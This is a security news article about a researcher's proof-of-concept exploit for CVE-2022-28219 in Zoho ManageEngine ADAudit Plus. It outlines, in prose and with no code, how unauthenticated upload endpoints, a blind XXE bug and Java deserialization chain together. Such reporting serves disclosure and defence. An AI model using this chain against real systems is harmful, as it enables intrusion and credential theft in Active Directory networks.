4 July 2022

Security researcher published PoC exploit for Zoho ManageEngine ADAudit Plus bug


Security researcher published PoC exploit for Zoho ManageEngine ADAudit Plus bug

Security researcher Naveen Sunkavally from Horizon3.ai uncovered technical details and published a proof-of-concept exploit code for a high severity vulnerability (CVE-2022-28219) in Zoho ManageEngine ADAudit Plus, a compliance tool used by enterprises to monitor changes to Active Directory.

Using this vulnerability, a cybercriminal can get the remote access to sensitive information. The flaw exists due to insufficient validation of user-supplied XML input. A remote attacker can pass a specially crafted XML code to the affected application and view contents of arbitrary files on the system or initiate requests to external systems.

According to Sunkavally, he found an endpoint managed by the CewolfRenderer servlet in the third-party Cewolf charting library. This fact interested him, and he decided to dig deeper.

It turned out that this was the same vulnerable endpoint from CVE-2020-10189, reported by researcher Steven Seeley against ManageEngine Desktop Central. As per Sunkavally, the FileStorage class in this library was abused for remote code execution via untrusted Java deserialization.

First, the researcher found out how to execute code remotely. The next thing he did was find a way to upload files without authentication. Sunkavally discovered that some ADAudit Plus endpoints used by agents running on the machine to upload security events did not require authentication. Then he managed to trigger a blind XXE vulnerability in the ProcessTrackingListener class which manages events with Windows scheduled task XML content.

The malicious actor can attack the affected ADAudit Plus instance, obtain credentials for the Active Directory and use this access to infect all the systems connected to the network with malaware.

Back to the list

Latest Posts

Ransomware gang target UK water supplier but send ransom demand to the wrong company

Ransomware gang target UK water supplier but send ransom demand to the wrong company

The threat actors claimed to have access to water treatment SCADA systems and “these systems which control chemicals in water.”
17 August 2022
Argentina's Judiciary of Cordoba targeted with ransomware

Argentina's Judiciary of Cordoba targeted with ransomware

The incident described as “worst attack on public institutions in history” impacted the agency’s website, digital services and databases.
16 August 2022
Microsoft disrupts Russian espionage hacker group targeting NATO countries and Ukraine

Microsoft disrupts Russian espionage hacker group targeting NATO countries and Ukraine

The group’s targets include defense and intelligence consulting companies, NGOs, IGOs, and higher education institutions.
16 August 2022